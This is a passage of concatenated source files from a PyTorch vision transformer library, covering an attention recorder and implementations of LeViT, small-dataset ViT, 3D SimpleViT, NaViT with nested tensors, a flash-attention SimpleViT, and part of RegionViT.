seq_pool=True, dropout_rate=0., attention_dropout=0.1, stochastic_depth=0.1, *args, **kwargs) def forward(self, x): x = self.tokenizer(x) return self.classifier(x) File: vit_pytorch/recorder.py from functools import wraps import torch from torch import nn from vit_pytorch.vit import Attention def find_modules(nn_module, type): return [module for module in nn_module.modules() if isinstance(module, type)] class Recorder(nn.Module): def __init__(self, vit, device = None): super().__init__() self.vit = vit self.data = None self.recordings = [] self.hooks = [] self.hook_registered = False self.ejected = False self.device = device def _hook(self, _, input, output): self.recordings.append(output.clone().detach()) def _register_hook(self): modules = find_modules(self.vit.transformer, 
Attention) for module in modules: handle = module.attend.register_forward_hook(self._hook) self.hooks.append(handle) self.hook_registered = True def eject(self): self.ejected = True for hook in self.hooks: hook.remove() self.hooks.clear() return self.vit def clear(self): self.recordings.clear() def record(self, attn): recording = attn.clone().detach() self.recordings.append(recording) def forward(self, img): assert not self.ejected, 'recorder has been ejected, cannot be used anymore' self.clear() if not self.hook_registered: self._register_hook() pred = self.vit(img) # move all recordings to one device before stacking target_device = self.device if self.device is not None else img.device recordings = tuple(map(lambda t: t.to(target_device), self.recordings)) attns = torch.stack(recordings, dim = 1) if len(recordings) > 0 else None return pred, attns File: vit_pytorch/levit.py from math import ceil import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def cast_tuple(val, l = 3): val = val if isinstance(val, tuple) else (val,) return (*val, *((val[-1],) * max(l - len(val), 0))) def always(val): return lambda *args, **kwargs: val # classes class FeedForward(nn.Module): def __init__(self, dim, mult, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim, dim * mult, 1), nn.Hardswish(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, fmap_size, heads = 8, dim_key = 32, dim_value = 64, dropout = 0., dim_out = None, downsample = False): super().__init__() inner_dim_key = dim_key * heads inner_dim_value = dim_value * heads dim_out = default(dim_out, dim) self.heads = heads self.scale = dim_key ** -0.5 self.to_q = nn.Sequential(nn.Conv2d(dim, inner_dim_key, 1, stride = (2 if downsample else 1), bias = False), nn.BatchNorm2d(inner_dim_key)) self.to_k = nn.Sequential(nn.Conv2d(dim, inner_dim_key, 1, bias = False), nn.BatchNorm2d(inner_dim_key)) self.to_v = nn.Sequential(nn.Conv2d(dim, inner_dim_value, 1, bias = False), nn.BatchNorm2d(inner_dim_value)) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) out_batch_norm = nn.BatchNorm2d(dim_out) nn.init.zeros_(out_batch_norm.weight) self.to_out = nn.Sequential( nn.GELU(), nn.Conv2d(inner_dim_value, dim_out, 1), out_batch_norm, nn.Dropout(dropout) ) # positional bias self.pos_bias = nn.Embedding(fmap_size * fmap_size, heads) q_range = torch.arange(0, fmap_size, step = (2 if downsample else 1)) k_range = torch.arange(fmap_size) q_pos = torch.stack(torch.meshgrid(q_range, q_range, indexing = 'ij'), dim = -1) k_pos = torch.stack(torch.meshgrid(k_range, k_range, indexing = 'ij'), dim = -1) q_pos, k_pos = map(lambda t: rearrange(t, 'i j c -> (i j) c'), (q_pos, k_pos)) rel_pos = (q_pos[:, None, ...] - k_pos[None, :, ...]).abs() x_rel, y_rel = rel_pos.unbind(dim = -1) pos_indices = (x_rel * fmap_size) + y_rel self.register_buffer('pos_indices', pos_indices) def apply_pos_bias(self, fmap): bias = self.pos_bias(self.pos_indices) bias = rearrange(bias, 'i j h -> () h i j') return fmap + (bias / self.scale) def forward(self, x): b, n, *_, h = *x.shape, self.heads q = self.to_q(x) y = q.shape[2] qkv = (q, self.to_k(x), self.to_v(x)) q, k, v = map(lambda t: rearrange(t, 'b (h d) ... -> b h (...) 
d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale dots = self.apply_pos_bias(dots) attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h (x y) d -> b (h d) x y', h = h, y = y) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, fmap_size, depth, heads, dim_key, dim_value, mlp_mult = 2, dropout = 0., dim_out = None, downsample = False): super().__init__() dim_out = default(dim_out, dim) self.layers = nn.ModuleList([]) self.attn_residual = (not downsample) and dim == dim_out for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, fmap_size = fmap_size, heads = heads, dim_key = dim_key, dim_value = dim_value, dropout = dropout, downsample = downsample, dim_out = dim_out), FeedForward(dim_out, mlp_mult, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: attn_res = (x if self.attn_residual else 0) x = attn(x) + attn_res x = ff(x) + x return x class LeViT(nn.Module): def __init__( self, *, image_size, num_classes, dim, depth, heads, mlp_mult, stages = 3, dim_key = 32, dim_value = 64, dropout = 0., num_distill_classes = None ): super().__init__() dims = cast_tuple(dim, stages) depths = cast_tuple(depth, stages) layer_heads = cast_tuple(heads, stages) assert all(map(lambda t: len(t) == stages, (dims, depths, layer_heads))), 'dimensions, depths, and heads must be a tuple that is less than the designated number of stages' self.conv_embedding = nn.Sequential( nn.Conv2d(3, 32, 3, stride = 2, padding = 1), nn.Conv2d(32, 64, 3, stride = 2, padding = 1), nn.Conv2d(64, 128, 3, stride = 2, padding = 1), nn.Conv2d(128, dims[0], 3, stride = 2, padding = 1) ) fmap_size = image_size // (2 ** 4) layers = [] for ind, dim, depth, heads in zip(range(stages), dims, depths, layer_heads): is_last = ind == (stages - 1) layers.append(Transformer(dim, fmap_size, depth, heads, dim_key, dim_value, mlp_mult, dropout)) if not is_last: next_dim = dims[ind + 1] layers.append(Transformer(dim, fmap_size, 1, heads * 2, dim_key, dim_value, dim_out = next_dim, downsample = True)) fmap_size = ceil(fmap_size / 2) self.backbone = nn.Sequential(*layers) self.pool = nn.Sequential( nn.AdaptiveAvgPool2d(1), Rearrange('... 
() () -> ...') ) self.distill_head = nn.Linear(dim, num_distill_classes) if exists(num_distill_classes) else always(None) self.mlp_head = nn.Linear(dim, num_classes) def forward(self, img): x = self.conv_embedding(img) x = self.backbone(x) x = self.pool(x) out = self.mlp_head(x) distill = self.distill_head(x) if exists(distill): return out, distill return out File: vit_pytorch/vit_for_small_dataset.py from math import sqrt import torch import torch.nn.functional as F from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class LSA(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.temperature = nn.Parameter(torch.log(torch.tensor(dim_head ** -0.5))) self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.temperature.exp() mask = torch.eye(dots.shape[-1], device = dots.device, dtype = torch.bool) mask_value = -torch.finfo(dots.dtype).max dots = dots.masked_fill(mask, mask_value) attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ LSA(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class SPT(nn.Module): def __init__(self, *, dim, patch_size, channels = 3): super().__init__() patch_dim = patch_size * patch_size * 5 * channels self.to_patch_tokens = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim) ) def forward(self, x): shifts = ((1, -1, 0, 0), (-1, 1, 0, 0), (0, 0, 1, -1), (0, 0, -1, 1)) shifted_x = list(map(lambda shift: F.pad(x, shift), shifts)) x_with_shifts = torch.cat((x, *shifted_x), dim = 1) return self.to_patch_tokens(x_with_shifts) class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
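        # a minimal usage sketch for this small-dataset ViT (SPT tokenization + LSA
        # attention), assuming the constructor arguments above; illustration only:
        #
        #   v = ViT(image_size = 256, patch_size = 16, num_classes = 1000,
        #           dim = 1024, depth = 6, heads = 16, mlp_dim = 2048,
        #           dropout = 0.1, emb_dropout = 0.1)
        #   img = torch.randn(1, 3, 256, 256)
        #   preds = v(img)   # (1, 1000)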
num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = SPT(dim = dim, patch_size = patch_size, channels = channels) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/simple_vit_3d.py import torch import torch.nn.functional as F from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_3d(patches, temperature = 10000, dtype = torch.float32): _, f, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype z, y, x = torch.meshgrid( torch.arange(f, device = device), torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') fourier_dim = dim // 6 omega = torch.arange(fourier_dim, device = device) / (fourier_dim - 1) omega = 1. / (temperature ** omega) z = z.flatten()[:, None] * omega[None, :] y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos(), z.sin(), z.cos()), dim = 1) pe = F.pad(pe, (0, dim - (fourier_dim * 6))) # pad if feature dimension not cleanly divisible by 6 return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, 
dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert frames % frame_patch_size == 0, 'Frames must be divisible by the frame patch size' num_patches = (image_height // patch_height) * (image_width // patch_width) * (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b f h w (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, video): *_, h, w, dtype = *video.shape, video.dtype x = self.to_patch_embedding(video) pe = posemb_sincos_3d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/__init__.py from vit_pytorch.vit import ViT from vit_pytorch.simple_vit import SimpleViT from vit_pytorch.mae import MAE from vit_pytorch.dino import Dino File: vit_pytorch/na_vit_nested_tensor.py from __future__ import annotations from typing import List from functools import partial import torch import packaging.version as pkg_version if pkg_version.parse(torch.__version__) < pkg_version.parse('2.4'): print('nested tensor NaViT was tested on pytorch 2.4') from torch import nn, Tensor import torch.nn.functional as F from torch.nn import Module, ModuleList from torch.nested import nested_tensor from einops import rearrange from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) def divisible_by(numer, denom): return (numer % denom) == 0 # feedforward def FeedForward(dim, hidden_dim, dropout = 0.): return nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim, bias = False) dim_inner = heads * dim_head self.heads = heads self.dim_head = dim_head self.to_queries = nn.Linear(dim, dim_inner, bias = False) self.to_keys = nn.Linear(dim, dim_inner, bias = False) self.to_values = nn.Linear(dim, dim_inner, bias = False) # in the paper, they employ qk rmsnorm, a way to stabilize attention # will use layernorm in place of rmsnorm, which has been shown to work in certain papers. 
requires l2norm on non-ragged dimension to be supported in nested tensors self.query_norm = nn.LayerNorm(dim_head, bias = False) self.key_norm = nn.LayerNorm(dim_head, bias = False) self.dropout = dropout self.to_out = nn.Linear(dim_inner, dim, bias = False) def forward( self, x, context: Tensor | None = None ): x = self.norm(x) # for attention pooling, one query pooling to entire sequence context = default(context, x) # queries, keys, values query = self.to_queries(x) key = self.to_keys(context) value = self.to_values(context) # split heads def split_heads(t): return t.unflatten(-1, (self.heads, self.dim_head)) def transpose_head_seq(t): return t.transpose(1, 2) query, key, value = map(split_heads, (query, key, value)) # qk norm for attention stability query = self.query_norm(query) key = self.key_norm(key) query, key, value = map(transpose_head_seq, (query, key, value)) # attention out = F.scaled_dot_product_attention( query, key, value, dropout_p = self.dropout if self.training else 0. ) # merge heads out = out.transpose(1, 2).flatten(-2) return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = ModuleList([]) for _ in range(depth): self.layers.append(ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) self.norm = nn.LayerNorm(dim, bias = False) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class NaViT(Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., token_dropout_prob: float | None = None ): super().__init__() image_height, image_width = pair(image_size) # what percent of tokens to dropout # if int or float given, then assume constant dropout prob # otherwise accept a callback that in turn calculates dropout prob from height and width self.token_dropout_prob = token_dropout_prob # calculate patching related stuff assert divisible_by(image_height, patch_size) and divisible_by(image_width, patch_size), 'Image dimensions must be divisible by the patch size.' 
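        # a minimal sketch of the jagged nested-tensor layout used in forward below,
        # assuming pytorch >= 2.4 as checked at the top of this file; illustration only:
        #
        #   seqs = [torch.randn(64, dim), torch.randn(16, dim)]   # ragged sequence lengths
        #   nt = nested_tensor(seqs, layout = torch.jagged)
        #   # linear projections, layernorm and F.scaled_dot_product_attention all run
        #   # on `nt` directly, so no padding of the shorter sequence is needed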
patch_height_dim, patch_width_dim = (image_height // patch_size), (image_width // patch_size) patch_dim = channels * (patch_size ** 2) self.channels = channels self.patch_size = patch_size self.to_patches = Rearrange('c (h p1) (w p2) -> h w (c p1 p2)', p1 = patch_size, p2 = patch_size) self.to_patch_embedding = nn.Sequential( nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embed_height = nn.Parameter(torch.randn(patch_height_dim, dim)) self.pos_embed_width = nn.Parameter(torch.randn(patch_width_dim, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) # final attention pooling queries self.attn_pool_queries = nn.Parameter(torch.randn(dim)) self.attn_pool = Attention(dim = dim, dim_head = dim_head, heads = heads) # output to logits self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, num_classes, bias = False) ) @property def device(self): return next(self.parameters()).device def forward( self, images: List[Tensor], # different resolution images ): batch, device = len(images), self.device arange = partial(torch.arange, device = device) assert all([image.ndim == 3 and image.shape[0] == self.channels for image in images]), f'all images must have {self.channels} channels and number of dimensions of 3 (channels, height, width)' all_patches = [self.to_patches(image) for image in images] # prepare factorized positional embedding height width indices positions = [] for patches in all_patches: patch_height, patch_width = patches.shape[:2] hw_indices = torch.stack(torch.meshgrid((arange(patch_height), arange(patch_width)), indexing = 'ij'), dim = -1) hw_indices = rearrange(hw_indices, 'h w c -> (h w) c') positions.append(hw_indices) # need the sizes to compute token dropout + positional embedding tokens = [rearrange(patches, 'h w d -> (h w) d') for patches in all_patches] # handle token dropout seq_lens = torch.tensor([i.shape[0] for i in tokens], device = device) if self.training and self.token_dropout_prob > 0: keep_seq_lens = ((1. - self.token_dropout_prob) * seq_lens).int().clamp(min = 1) kept_tokens = [] kept_positions = [] for one_image_tokens, one_image_positions, seq_len, num_keep in zip(tokens, positions, seq_lens, keep_seq_lens): keep_indices = torch.randn((seq_len,), device = device).topk(num_keep, dim = -1).indices one_image_kept_tokens = one_image_tokens[keep_indices] one_image_kept_positions = one_image_positions[keep_indices] kept_tokens.append(one_image_kept_tokens) kept_positions.append(one_image_kept_positions) tokens, positions, seq_lens = kept_tokens, kept_positions, keep_seq_lens # add all height and width factorized positions height_indices, width_indices = torch.cat(positions).unbind(dim = -1) height_embed, width_embed = self.pos_embed_height[height_indices], self.pos_embed_width[width_indices] pos_embed = height_embed + width_embed # use nested tensor for transformers and save on padding computation tokens = torch.cat(tokens) # linear projection to patch embeddings tokens = self.to_patch_embedding(tokens) # absolute positions tokens = tokens + pos_embed tokens = nested_tensor(tokens.split(seq_lens.tolist()), layout = torch.jagged, device = device) # embedding dropout tokens = self.dropout(tokens) # transformer tokens = self.transformer(tokens) # attention pooling # will use a jagged tensor for queries, as SDPA requires all inputs to be jagged, or not attn_pool_queries = [rearrange(self.attn_pool_queries, '... 
-> 1 ...')] * batch
        attn_pool_queries = nested_tensor(attn_pool_queries, layout = torch.jagged)

        pooled = self.attn_pool(attn_pool_queries, tokens)

        # back to unjagged

        logits = torch.stack(pooled.unbind())
        logits = rearrange(logits, 'b 1 d -> b d')

        logits = self.to_latent(logits)
        return self.mlp_head(logits)

# quick test

if __name__ == '__main__':

    v = NaViT(
        image_size = 256,
        patch_size = 32,
        num_classes = 1000,
        dim = 1024,
        depth = 6,
        heads = 16,
        mlp_dim = 2048,
        dropout = 0.,
        emb_dropout = 0.,
        token_dropout_prob = 0.1
    )

    # 5 images of different resolutions - List[Tensor]

    images = [
        torch.randn(3, 256, 256),
        torch.randn(3, 128, 128),
        torch.randn(3, 128, 256),
        torch.randn(3, 256, 128),
        torch.randn(3, 64, 256)
    ]

    assert v(images).shape == (5, 1000)

File: vit_pytorch/simple_flash_attn_vit.py

from collections import namedtuple
from packaging import version

import torch
import torch.nn.functional as F
from torch import nn, einsum

from einops import rearrange
from einops.layers.torch import Rearrange

# constants

Config = namedtuple('FlashAttentionConfig', ['enable_flash', 'enable_math', 'enable_mem_efficient'])

# helpers

def pair(t):
    return t if isinstance(t, tuple) else (t, t)

def posemb_sincos_2d(patches, temperature = 10000, dtype = torch.float32):
    _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype

    y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij')
    assert (dim % 4) == 0, 'feature dimension must be multiple of 4 for sincos emb'
    omega = torch.arange(dim // 4, device = device) / (dim // 4 - 1)
    omega = 1. / (temperature ** omega)

    y = y.flatten()[:, None] * omega[None, :]
    x = x.flatten()[:, None] * omega[None, :]
    pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1)
    return pe.type(dtype)

# main class

class Attend(nn.Module):
    def __init__(self, use_flash = False):
        super().__init__()
        self.use_flash = use_flash
        assert not (use_flash and version.parse(torch.__version__) < version.parse('2.0.0')), 'in order to use flash attention, you must be using pytorch 2.0 or above'

        # determine efficient attention configs for cuda and cpu

        self.cpu_config = Config(True, True, True)
        self.cuda_config = None

        if not torch.cuda.is_available() or not use_flash:
            return

        device_properties = torch.cuda.get_device_properties(torch.device('cuda'))

        if device_properties.major == 8 and device_properties.minor == 0:
            self.cuda_config = Config(True, False, False)
        else:
            self.cuda_config = Config(False, True, True)

    def flash_attn(self, q, k, v):
        config = self.cuda_config if q.is_cuda else self.cpu_config

        # flash attention - https://arxiv.org/abs/2205.14135

        with torch.backends.cuda.sdp_kernel(**config._asdict()):
            out = F.scaled_dot_product_attention(q, k, v)

        return out

    def forward(self, q, k, v):
        n, device, scale = q.shape[-2], q.device, q.shape[-1] ** -0.5

        if self.use_flash:
            return self.flash_attn(q, k, v)

        # similarity

        sim = einsum("b h i d, b h j d -> b h i j", q, k) * scale

        # attention

        attn = sim.softmax(dim=-1)

        # aggregate values

        out = einsum("b h i j, b h j d -> b h i d", attn, v)

        return out

# classes

class FeedForward(nn.Module):
    def __init__(self, dim, hidden_dim):
        super().__init__()
        self.net = nn.Sequential(
            nn.LayerNorm(dim),
            nn.Linear(dim, hidden_dim),
            nn.GELU(),
            nn.Linear(hidden_dim, dim),
        )

    def forward(self, x):
        return self.net(x)

class Attention(nn.Module):
    def __init__(self, dim, heads = 8, dim_head = 64, use_flash = True):
        super().__init__()
        inner_dim = dim_head * heads
        self.heads = heads
        self.scale = dim_head ** -0.5
        self.norm = nn.LayerNorm(dim)
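        # a minimal sketch of what the Attend module above toggles, assuming
        # pytorch >= 2.0; illustration only:
        #
        #   with torch.backends.cuda.sdp_kernel(enable_flash = True, enable_math = False, enable_mem_efficient = False):
        #       out = F.scaled_dot_product_attention(q, k, v)   # q, k, v of shape (b, h, n, d)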
self.attend = Attend(use_flash = use_flash) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) out = self.attend(q, k, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, use_flash): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, use_flash = use_flash), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, use_flash = True): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, use_flash) self.to_latent = nn.Identity() self.linear_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): *_, h, w, dtype = *img.shape, img.dtype x = self.to_patch_embedding(img) pe = posemb_sincos_2d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/regionvit.py import torch from torch import nn, einsum from einops import rearrange from einops.layers.torch import Rearrange, Reduce import torch.nn.functional as F # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) def divisible_by(val, d): return (val % d) == 0 # helper classes class Downsample(nn.Module): def __init__(self, dim_in, dim_out): super().__init__() self.conv = nn.Conv2d(dim_in, dim_out, 3, stride = 2, padding = 1) def forward(self, x): return self.conv(x) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1) def forward(self, x): return self.proj(x) + x # transformer classes def FeedForward(dim, mult = 4, dropout = 0.): return nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, dim * mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Linear(dim * mult, dim, 1) ) class Attention(nn.Module): def __init__( self, dim, heads = 4, dim_head = 32, dropout = 0. 
): super().__init__() self.heads = heads self.scale = dim_head ** -0.5 inner_dim = dim_head * heads self.norm = nn.LayerNorm(dim) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, rel_pos_bias = None): h = self.heads # prenorm x = self.norm(x) q, k, v = self.to_qkv(x).chunk(3, dim = -1) # split heads q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v)) q = q * self.scale sim = einsum('b h i d, b h j d -> b h i j', q, k) # add relative positional bias for local tokens if exists(rel_pos_bias): sim = sim + rel_pos_bias attn = sim.softmax(dim = -1) attn = self.dropout(attn) # merge heads out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class R2LTransformer(nn.Module): def __init__( self, dim, *, window_size, depth = 4, heads = 4, dim_head = 32, attn_dropout = 0., ff_dropout = 0., ): super().__init__() self.layers = nn.ModuleList([]) self.window_size = window_size rel_positions = 2 * window_size - 1 self.local_rel_pos_bias = nn.Embedding(rel_positions ** 2, heads) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = attn_dropout), FeedForward(dim, dropout = ff_dropout) ])) def forward(self, local_tokens, region_tokens): device = local_tokens.device lh, lw = local_tokens.shape[-2:] rh, rw = region_tokens.shape[-2:] window_size_h, window_size_w = lh // rh, lw // rw local_tokens = rearrange(local_tokens, 'b c h w -> b (h w) c') region_tokens = rearrange(region_tokens, 'b c h w -> b (h w) c') # calculate local relative positional bias h_range = torch.arange(window_size_h, device = device) w_range = torch.arange(window_size_w, device = device) grid_x, grid_y = torch.meshgrid(h_range, w_range, indexing = 'ij') grid = torch.stack((grid_x, grid_y)) grid = rearrange(grid, 'c h w -> c (h w)') grid = (grid[:, :, None] - grid[:, None, :]) + (self.window_size - 1) bias_indices = (grid * torch.tensor([1, self.window_size * 2 - 1], device = device)[:, None, None]).sum(dim = 0) rel_pos_bias = self.local_rel_pos_bias(bias_indices) rel_pos_bias = rearrange(rel_pos_bias, 'i j h -> () h i j') rel_pos_bias = F.pad(rel_pos_bias, (1, 0, 1, 0), value = 0) # go through r2l transformer layers for attn, ff in self.layers: region_tokens = attn(region_tokens) + region_tokens # concat region tokens to local tokens local_tokens = rearrange(local_tokens, 'b (h w) d -> b h w d', h = lh) local_tokens = rearrange(local_tokens, 'b (h p1) (w p2) d -> (b h w) (p1 